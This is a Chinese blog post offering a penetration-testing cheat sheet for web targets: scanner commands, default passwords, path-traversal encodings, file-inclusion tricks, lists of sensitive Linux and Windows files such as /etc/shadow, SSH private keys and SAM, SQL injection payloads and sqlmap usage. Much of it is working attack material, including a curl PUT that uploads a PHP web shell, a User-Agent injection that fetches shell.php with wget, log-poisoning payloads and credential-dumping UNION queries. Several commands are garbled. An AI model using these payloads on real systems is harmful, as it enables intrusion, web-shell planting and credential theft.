• 我们在哪一颗星上见过 ,以至如此相互思念 ;我们在哪一颗星上相互思念过,以至如此相互深爱
  • 我们在哪一颗星上分别 ,以至如此相互辉映 ;我们在哪一颗星上入睡 ,以至如此唤醒黎明
  • 认识世界 克服困难 洞悉所有 贴近生活 寻找珍爱 感受彼此

渗透测试: 网站扫描和模糊测试工具汇总

渗透测试 云涯 5年前 (2019-08-25) 3781次浏览 0个评论

⽹站扫描和模糊测试⼯具汇总

Nikto

nikto -h http://INSERTIPADDRESS

使⽤代理的情况:

nikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444

Curl

获取⽹站header信息:

curl -i INSERTIPADDRESS

获取⽹站的所有信息:

curl -i -L INSERTIPADDRESS

获取⽹站title和所有链接:

curl INSERTIPADDRESS -s -L | grep “title|href” | sed -e ‘s/^[[:space:]]*//’

只获取⻚⾯中的⽂本内容:

curl INSERTIPADDRESS -s -L | html2text -width ’99’ | uniq

使⽤PUT请求上传shell:

curl -v -X OPTIONS http://INSERTIPADDRESS/

curl -v -X PUT -d ‘< php system($_GET[“cmd”]);  >’ http://INSERTIPADDRESS/test/shell.php

Dirb

dirb http://INSERTIPADDRESS

将测试结果进⾏保存

dirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt

使⽤指定的字典进⾏测试:

dirb http://INSERTIPADDRESS /usr/share/wordlists/dirb/common.txt

测试制定的扩展名:

dirb http://INSERTIPADDRESS -X .php,.txt

使⽤代理:

dirb http://INSERTIPADDRESS -p PROXYIP:PROXYPORT -P proxyusername:proxypassword

Gobuster

gobuster -u http://IPADDRESS/ -w words.txt

测试指定的扩展:

gobuster -u http://IPADDRESS/ -w words.txt -x php,txt

WordPress 扫描

wpscan -u http://INSERTIPADDRESS

枚举⽤⼾:

wpscan -u http://INSERTIPADDRESS -e u

默认⼝令和弱⼝令

Google 语法:

site:webapplication.com password

常⻅的默认账号密码:

admin admin

admin password

admin <blank>

admin <servicename>

<servicename> <servicename>

root root

root admin

root password

root <servicename>

<username> password

<username> admin

<username> username

username <servicename>  

本地和远程⽂件包含

跨⽬录常⻅编码

../

..\

..\/

%2e%2e%2f

%252e%252e%252f

%c0%ae%c0%ae%c0%af

%uff0e%uff0e%u2215

%uff0e%uff0e%u2216

..././

...\.\

检查 php 的配置是否包含⽂件包含的问题:

远程⽂件包含:

allow_url_fopen=on and allow_url_include=on

空字节注⼊:

magic_quotes_gpc=off

本地⽂件包含检查

fimap -u “http://INSERTIPADDRESS/example.php test=”dotdotpwn.pl -m http -h 192.168.1.1 -M GET

curl -s http://INSERTIPADDRESS/gallery.php page=/etc/passwd/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php page=

使⽤ base64 编码绕过检测

http://INSERTIPADDRESS/index.php page=php://filter/convert.base64-encode/resource=index base64 -d savefile.php

使⽤空字节或者问号绕过检测

http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00

http://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt

伪造 UA 然后包含 /proc/self/environ 获取 shell

USERAGENT:  < system(‘wget http://IPADDRESS/shell.php -O < system(‘wget http://IPADDRESS/shell.php -O shell.php’); >

LFI:  www.website.com/view.php page=../../../../../proc/self/environ http://www.website.com/view.php page=../../../../../proc/self/environ

包含访问⽇志

nc 10.10.10.10 80
GET /<?php echo shell_exec($_GET['cmd']); ?> HTTP/1.1
Host: 10.10.10.10
Connection: close
LFI: www.website.com/view.php?
page=../../../../../var/log/apache2/access.log&cmd=id

包含 ssh 的登录⽇志

ssh "<?php phpinfo();?>"@IPADDRESS
LFI: www.website.com/view.php?page=../../../../../var/log/auth.log

包含 php 的 session ⽂件

需要提前获取到当前的 sessionid

LFI: http://www.website.com/view.php page=../../../../../var/lib/php/sess_as7sdfasd87392s

Linux 下可以包含的⽂件

/etc/passwd

/etc/shadow

/etc/aliases

/etc/anacrontab

/etc/apache2/apache2.conf

/etc/apache2/httpd.conf

/etc/at.allow

/etc/at.deny

/etc/bashrc

/etc/bootptab

/etc/chrootUsers

/etc/chttp.conf

/etc/cron.allow

/etc/cron.deny

/etc/crontab

/etc/cups/cupsd.conf

/etc/exports

/etc/fstab

/etc/ftpaccess

/etc/ftpchroot

/etc/ftphosts

/etc/groups

/etc/grub.conf

/etc/hosts

/etc/hosts.allow

/etc/hosts.deny

/etc/httpd/access.conf

/etc/httpd/conf/httpd.conf

/etc/httpd/httpd.conf

/etc/httpd/logs/access_log

/etc/httpd/logs/access.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/php.ini

/etc/httpd/srm.conf

/etc/inetd.conf

/etc/inittab

/etc/issue

/etc/lighttpd.conf

/etc/lilo.conf

/etc/logrotate.d/ftp

/etc/logrotate.d/proftpd

/etc/logrotate.d/vsftpd.log

/etc/lsb-release

/etc/motd

/etc/modules.conf

/etc/motd

/etc/mtab

/etc/my.cnf

/etc/my.conf

/etc/mysql/my.cnf

/etc/network/interfaces

/etc/networks

/etc/npasswd

/etc/passwd

/etc/php4.4/fcgi/php.ini

/etc/php4/apache2/php.ini

/etc/php4/apache/php.ini

/etc/php4/cgi/php.ini

/etc/php4/apache2/php.ini

/etc/php5/apache2/php.ini

/etc/php5/apache/php.ini

/etc/php/apache2/php.ini

/etc/php/apache/php.ini

/etc/php/cgi/php.ini

/etc/php.ini

/etc/php/php4/php.ini

/etc/php/php.ini

/etc/printcap

/etc/profile

/etc/proftp.conf

/etc/proftpd/proftpd.conf

/etc/pure-ftpd.conf

/etc/pureftpd.passwd

/etc/pureftpd.pdb

/etc/pure-ftpd/pure-ftpd.conf

/etc/pure-ftpd/pure-ftpd.pdb

/etc/pure-ftpd/putreftpd.pdb

/etc/redhat-release

/etc/resolv.conf

/etc/samba/smb.conf

/etc/snmpd.conf

/etc/ssh/ssh_config

/etc/ssh/sshd_config

/etc/ssh/ssh_host_dsa_key

/etc/ssh/ssh_host_dsa_key.pub

/etc/ssh/ssh_host_key

/etc/ssh/ssh_host_key.pub

/etc/sysconfig/network

/etc/syslog.conf

/etc/termcap

/etc/vhcs2/proftpd/proftpd.conf

/etc/vsftpd.chroot_list

/etc/vsftpd.conf

/etc/vsftpd/vsftpd.conf

/etc/wu-ftpd/ftpaccess

/etc/wu-ftpd/ftphosts

/etc/wu-ftpd/ftpusers

/logs/pure-ftpd.log

/logs/security_debug_log

/logs/security_log

/opt/lampp/etc/httpd.conf

/opt/xampp/etc/php.ini

/proc/cpuinfo

/proc/filesystems

/proc/interrupts

/proc/ioports

/proc/meminfo

/proc/modules

/proc/mounts

/proc/stat

/proc/swaps

/proc/version

/proc/self/net/arp

/root/anaconda-ks.cfg

/usr/etc/pure-ftpd.conf

/usr/lib/php.ini

/usr/lib/php/php.ini

/usr/local/apache/conf/modsec.conf

/usr/local/apache/conf/php.ini

/usr/local/apache/log

/usr/local/apache/logs

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/usr/local/apache/audit_log

/usr/local/apache/error_log

/usr/local/apache/error.log

/usr/local/cpanel/logs

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/etc/httpd/logs/access_log

/usr/local/etc/httpd/logs/error_log

/usr/local/etc/php.ini

/usr/local/etc/pure-ftpd.conf

/usr/local/etc/pureftpd.pdb

/usr/local/lib/php.ini

/usr/local/php4/httpd.conf

/usr/local/php4/httpd.conf.php

/usr/local/php4/lib/php.ini

/usr/local/php5/httpd.conf

/usr/local/php5/httpd.conf.php

/usr/local/php5/lib/php.ini

/usr/local/php/httpd.conf

/usr/local/php/httpd.conf.ini

/usr/local/php/lib/php.ini

/usr/local/pureftpd/etc/pure-ftpd.conf

/usr/local/pureftpd/etc/pureftpd.pdn

/usr/local/pureftpd/sbin/pure-config.pl

/usr/local/www/logs/httpd_log

/usr/local/Zend/etc/php.ini

/usr/sbin/pure-config.pl

/var/adm/log/xferlog

/var/apache2/config.inc

/var/apache/logs/access_log

/var/apache/logs/error_log

/var/cpanel/cpanel.config

/var/lib/mysql/my.cnf

/var/lib/mysql/mysql/user.MYD

/var/local/www/conf/php.ini

/var/log/apache2/access_log

/var/log/apache2/access.log

/var/log/apache2/error_log

/var/log/apache2/error.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/apache-ssl/access.log

/var/log/apache-ssl/error.log

/var/log/auth.log

/var/log/boot

/var/htmp

/var/log/chttp.log

/var/log/cups/error.log

/var/log/daemon.log

/var/log/debug

/var/log/dmesg

/var/log/dpkg.log

/var/log/exim_mainlog

/var/log/exim/mainlog

/var/log/exim_paniclog

/var/log/exim.paniclog

/var/log/exim_rejectlog

/var/log/exim/rejectlog

/var/log/faillog

/var/log/ftplog

/var/log/ftp-proxy

/var/log/ftp-proxy/ftp-proxy.log

/var/log/httpd-access.log

/var/log/httpd/access_log

/var/log/httpd/access.log

/var/log/httpd/error_log

/var/log/httpd/error.log

/var/log/httpsd/ssl.access_log

/var/log/httpsd/ssl_log

/var/log/kern.log

/var/log/lastlog

/var/log/lighttpd/access.log

/var/log/lighttpd/error.log

/var/log/lighttpd/lighttpd.access.log

/var/log/lighttpd/lighttpd.error.log

/var/log/mail.info

/var/log/mail.log

/var/log/maillog

/var/log/mail.warn

/var/log/message

/var/log/messages

/var/log/mysqlderror.log

/var/log/mysql.log

/var/log/mysql/mysql-bin.log

/var/log/mysql/mysql.log

/var/log/mysql/mysql-slow.log

/var/log/proftpd

/var/log/pureftpd.log

/var/log/pure-ftpd/pure-ftpd.log

/var/log/secure

/var/log/vsftpd.log

/var/log/wtmp

/var/log/xferlog

/var/log/yum.log

/var/mysql.log

/var/run/utmp

/var/spool/cron/crontabs/root

/var/webmin/miniserv.log

/var/www/log/access_log

/var/www/log/error_log

/var/www/logs/access_log

/var/www/logs/error_log

/var/www/logs/access.log

/var/www/logs/error.log

~/.atfp_history

~/.bash_history

~/.bash_logout

~/.bash_profile

~/.bashrc

~/.gtkrc

~/.login

~/.logout

~/.mysql_history

~/.nano_history

~/.php_history

~/.profile

~/.ssh/authorized_keys

~/.ssh/id_dsa  

~/.ssh/id_dsa.pub

~/.ssh/id_rsa

~/.ssh/id_rsa.pub

~/.ssh/identity

~/.ssh/identity.pub

~/.viminfo

~/.wm_style

~/.Xdefaults

~/.xinitrc

~/.Xresources

~/.xsession

Windows下可以包含的⽂件

C:/Users/Administrator/NTUser.dat

C:/Documents and Settings/Administrator/NTUser.dat

C:/apache/logs/access.log

C:/apache/logs/error.log

C:/apache/php/php.ini

C:/boot.ini

C:/inetpub/wwwroot/global.asa

C:/MySQL/data/hostname.err

C:/MySQL/data/mysql.err

C:/MySQL/data/mysql.log

C:/MySQL/my.cnf

C:/MySQL/my.ini

C:/php4/php.ini

C:/php5/php.ini

C:/php/php.ini

C:/Program Files/Apache Group/Apache2/conf/httpd.conf

C:/Program Files/Apache Group/Apache/conf/httpd.conf

C:/Program Files/Apache Group/Apache/logs/access.log

C:/Program Files/Apache Group/Apache/logs/error.log

C:/Program Files/FileZilla Server/FileZilla Server.xml

C:/Program Files/MySQL/data/hostname.err

C:/Program Files/MySQL/data/mysql-bin.log

C:/Program Files/MySQL/data/mysql.err

C:/Program Files/MySQL/data/mysql.log

C:/Program Files/MySQL/my.ini

C:/Program Files/MySQL/my.cnf

C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err

C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log  

C:/Program Files/MySQL/MySQL Server 5.0/my.cnf

C:/Program Files/MySQL/MySQL Server 5.0/my.ini

C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf

C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf

C:/Program Files (x86)/Apache Group/Apache/conf/access.log

C:/Program Files (x86)/Apache Group/Apache/conf/error.log

C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml

C:/Program Files (x86)/xampp/apache/conf/httpd.conf

C:/WINDOWS/php.ini

C:/WINDOWS/Repair/SAM

C:/Windows/repair/system

C:/Windows/repair/software

C:/Windows/repair/security

C:/WINDOWS/System32/drivers/etc/hosts

C:/Windows/win.ini

C:/WINNT/php.ini

C:/WINNT/win.ini

C:/xampp/apache/bin/php.ini

C:/xampp/apache/logs/access.log

C:/xampp/apache/logs/error.log

C:/Windows/Panther/Unattend/Unattended.xml

C:/Windows/Panther/Unattended.xml

C:/Windows/debug/NetSetup.log

C:/Windows/system32/config/AppEvent.Evt

C:/Windows/system32/config/SecEvent.Evt

C:/Windows/system32/config/default.sav

C:/Windows/system32/config/security.sav

C:/Windows/system32/config/software.sav

C:/Windows/system32/config/system.sav

C:/Windows/system32/config/regback/default

C:/Windows/system32/config/regback/sam

C:/Windows/system32/config/regback/security

C:/Windows/system32/config/regback/system

C:/Windows/system32/config/regback/software

C:/Program Files/MySQL/MySQL Server 5.1/my.ini

C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml

C:/Windows/System32/inetsrv/config/applicationHost.config

C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log

SQL-Injection

'

admin' or '1'='1

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin',

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

获取当前表名:

1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables;

获取列名:

1 UNION SELECT 1,column_name,3,4 FROM information_schema.columns;

获取⽤⼾名密码举例:

1 UNION SELECT 1,concat(login,’:’,password),3,4 FROM users;

使⽤ URL 编码举例:

http://INSERTIPADDRESS/database.php id=1%20UNION%20SELECT%201,concat%2

8table_name,%27:%27,%20column_name%29%20FROM%20information_schema.columns

使⽤ SQLMap

最简单的模式:

sqlmap –wizard

使⽤ burp 保存的 请求包:

sqlmap -r request.txt

指定 cookie 值:

sqlmap -u “http://INSERTIPADDRESS/index.php id=1” –cookie “PHPSESSIONID=1234example”

dump 数据:

sqlmap -u “http://INSERTIPADDRESS/index.php id=1” –dbms=mysql -D databasename -T tablename –dump

指定 Crawl :

sqlmap -u http://INSERTIPADDRESS –dbms=mysql –crawl=3

其他杂项

根据⽹站域名⽣成不重复的字典:

cewl -w websitewordlist.txt http://INSERTIPADDRESS

连接 WebDAV

cadaver http://IPADDRESS/webdav

Port 443 – HTTPS

读取证书信息:

openssl s_client -connect HOSTNAME:PORT -showcerts

⼼脏滴⾎漏洞检测

sslscan INSERTIPADDRESS:443


云涯历险记 , 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:渗透测试: 网站扫描和模糊测试工具汇总
喜欢 (0)

您必须 登录 才能发表评论!